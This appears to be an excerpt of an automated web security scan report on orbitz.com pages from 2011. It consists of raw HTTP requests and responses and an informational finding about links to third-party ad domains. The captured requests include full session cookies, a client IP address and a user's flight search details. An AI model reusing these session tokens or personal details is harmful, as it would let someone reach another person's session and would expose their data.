Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598467266:ss=1317596806325; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|bos|mia|mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:34:31 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:34:31 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:34:31 GMT
Content-Length: 157657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
        </noscript>
...[SNIP]...
id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
d" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&" height="280" width="336" border="0"></a>
...[SNIP]...
ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&" height="55" width="120" border="0"></a>
...[SNIP]...
="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...
19.224. http://www.orbitz.com/App/ViewFlightSearchResults  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewFlightSearchResults

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=7651&r=6bk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:19 GMT
Content-Length: 492180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=728x90_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=728x90_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=728x90_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<div id="hotwireTop">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=hotwireTop&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgTopAd=true&aapd=true&dcity=Miami&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=hotwireTop&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgTopAd=true&aapd=true&dcity=Miami&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=hotwireTop&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgTopAd=true&aapd=true&dcity=Miami&" height="30" width="475" border="0"></a>
...[SNIP]...
<div onClick="isSessionTimedOut(event, false, 'msgB');">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=125x125_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgLeftAd=true&aapd=true&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=125x125_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgLeftAd=true&aapd=true&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=125x125_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgLeftAd=true&aapd=true&" height="125" width="125" border="0"></a>
...[SNIP]...
<div class="aphXSell">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=125x125_bottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=125x125_bottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=125x125_bottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&" height="125" width="125" border="0"></a>
...[SNIP]...
<div class="ad" id="ad149x65">
<iframe allowtransparency="true" height="65" width="149" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&" height="65" width="149" border="0"></a>
...[SNIP]...
<div class="ad" id="adhotwireBottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=hotwireBottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=175&width=125&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=hotwireBottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=175&width=125&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=hotwireBottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=175&width=125&adType=noframe&" height="175" width="125" border="0"></a>
...[SNIP]...
<div class="ad" id="ad160x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=160x600&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=120&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=160x600&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=120&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=160x600&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=120&adType=noframe&" height="600" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad160x600_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=160x600_right&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=160&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=results&adsize=160x600_right&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=160&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=results&adsize=160x600_right&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=160&adType=noframe&" height="600" width="160" border="0"></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&" height="55" width="120" border="0"></a></noscript> <a class="eaEnabled" rel="nofollow" href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101&popupsDisabled=true" target="_blank" onClick="return 